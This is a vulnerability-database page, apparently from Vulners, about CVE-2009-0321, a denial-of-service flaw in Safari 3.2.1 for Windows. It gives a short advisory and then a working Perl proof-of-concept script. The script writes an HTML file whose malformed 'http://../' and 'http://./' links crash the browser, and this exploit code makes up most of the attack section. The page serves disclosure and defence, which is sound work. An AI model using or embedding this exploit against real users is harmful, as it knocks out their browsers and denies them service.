Apple Safari For Windows 3.2.1 - URI Remote Denial of Service
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2009-0321 | 27 Jan 200900:00 | – | circl | |
| CVE-2009-0321 | 28 Jan 200918:00 | – | cve | |
| CVE-2009-0321 | 28 Jan 200918:00 | – | cvelist | |
| EUVD-2009-0325 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-0321 | 28 Jan 200918:30 | – | nvd | |
| Apple Safari Malformed URI Remote DoS Vulnerability - Windows | 3 Feb 200900:00 | – | openvas | |
| Apple Safari Malformed URI Remote DoS Vulnerability (Windows) | 3 Feb 200900:00 | – | openvas | |
| Design/Logic Flaw | 28 Jan 200918:30 | – | prion |
source: https://www.securityfocus.com/bid/33481/info
Apple Safari is prone to a denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
Apple Safari 3.2.1 for Windows is vulnerable; other versions may also be affected.
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [[email protected] ]
#[http://lostmon.blogspot.com]
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Uso: $0 <archivo.html>\n";
}
$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>([email protected]) http://lostmon.blogspot.com</h3>
<P>This PoC is a malformed http URI, this causes that safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href=\"http://../\">Safari Die()</a> or this other =><a href=\"http://./\">Safari Die()</a>
";
$piepag = "</body></html>";
$datos = $cabecera . $codigo . $piepag;
open(FILE, '>' . $archivo);
print FILE $datos;
close(FILE);
exit;Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.02357